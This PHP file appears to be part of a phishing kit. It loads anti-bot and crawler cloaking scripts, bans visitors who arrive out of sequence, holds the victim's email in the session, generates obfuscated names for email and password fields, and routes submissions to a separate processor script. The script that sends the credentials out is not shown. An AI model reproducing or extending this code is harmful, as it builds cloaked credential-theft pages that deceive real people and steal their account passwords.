<?php
session_start();
error_reporting(0);
include '../../includes/bt.php';
include '../../includes/basicbot.php';
include '../../includes/uacrawler.php';
include '../../includes/refspam.php';
include '../../includes/ipselect.php';
include "../../includes/bts2.php";
if(!isset($_SESSION['emailbeenset']) && isset($_SESSION['fldr'])){banbot();};
$idc=md5("esub".uniqid());
$proc="../".$_SESSION['processor'];
$ename=gaN("email");
$pname=gaN("emailpass");
$epage="../".$index.'?'.genv('email');
if(!isset($_SESSION['email'])){header('location:'.$epage);};
if(isset($_GET[$theerrkey])){$eshow="?".$theerrkey."=On";};
?>